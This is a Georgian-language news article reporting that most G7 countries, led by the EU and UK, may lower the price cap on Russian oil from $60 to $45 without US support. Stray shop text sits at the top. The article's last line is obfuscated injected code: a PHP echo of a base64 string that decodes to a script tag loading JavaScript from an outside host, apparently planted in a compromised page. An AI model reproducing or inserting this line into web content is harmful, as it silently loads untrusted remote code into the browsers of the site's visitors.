gorgia
გარე ავეჯი

დიდი შვიდეულის (G7) ქვეყნების უმეტესობა მზად არის, რუსული ნავთობზე ზღვრული ფასი დამოუკიდებლად შეამციროს, თუ აშშ-ის პრეზიდენტი, დონალდ ტრამპი ამ იდეას მხარს არ დაუჭერს - ამის შესახებ Reuters-ს ოთხმა წყარომ განუცხადა.

კერძოდ, სააგენტოს ანონიმური წყაროები აცხადებენ, რომ ევროკავშირი და დიდი ბრიტანეთი მზად არიან, გამოიჩინონ ინიციატივა და G7-ის სხვა ევროპული ქვეყნებისა და კანადის მხარდაჭერით დამოუკიდებლად იმოქმედონ.

ევროპულ ქვეყნებს კანადის სამიტზე ერთიანი გადაწყვეტილების მიღწევა სურთ, თუმცა ვაშინგტონის საბოლოო პოზიცია ჯერ უცნობია. წყაროების ცნობით, გაურკვეველია ოფიციალური ტოკიოს პოზიციაც.

ევროკავშირი და დიდი ბრიტანეთი თვეების განმავლობაში საუბრობდნენ საზღვაო გზით გადაზიდულ რუსულ ნავთობზე ზღვრული ფასის შემცირებაზე, რომელიც დასავლური სადაზღვევო კომპანიების გამოყენებით მესამე ქვეყნებს მიეწოდება. ნავთობზე გლობალური ფასების ვარდნამ ამჟამინდელი 60-დოლარიანი ლიმიტი, თითქმის, არააქტუალური გახადა.

„ევროპული ქვეყნები ცდილობენ, ბარელ ნავთობზე ზღვრული ფასი 60-იდან 45 დოლარამდე შეამცირონ. კანადიდან, დიდი ბრიტანეთიდან და შესაძლოა, იაპონიიდანაც დადებითი სიგნალები მოდის. ჩვენ G7-ის პლატფორმას აშშ-ის მხარდაჭერის უზრუნველსაყოფად ვიყენებთ,“ - ამბობს ერთ-ერთი წყარო.

ცნობისთვის: რუსულ ნავთობზე 60-დოლარიანი ზღვრული ფასი ძალაში 2022 წლის დეკემბრიდან შევიდა. გასული წლის გაზაფხულზე G7-ის ქვეყნები ფასის კიდევ უფრო დაწევას განიხილავდნენ, თუმცა შეთანხმებას ვერ მიაღწიეს: შეშფოთება აშშ-მა გამოთქვა, რომელიც თვლიდა, რომ ამან შესაძლოა, ენერგომატარებლებზე გლობალური ფასების მკვეთრი ზრდა გამოიწვიოს.

ბარელ რუსულ ნავთობზე ზღვრული ფასის ამჟამინდელი 60 დოლარიდან 45 დოლარამდე შემცირებას, ასევე, რუსული ენერგეტიკული ინფრასტრუქტურის, მათ შორის, მილსადენ „ჩრდილოეთ ნაკადის“ ექსპლუატაციის აკრძალვას რუსეთის წინააღმდეგ ევროკავშირის სანქციების მე-18 პაკეტიც ითვალისწინებს.

133
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");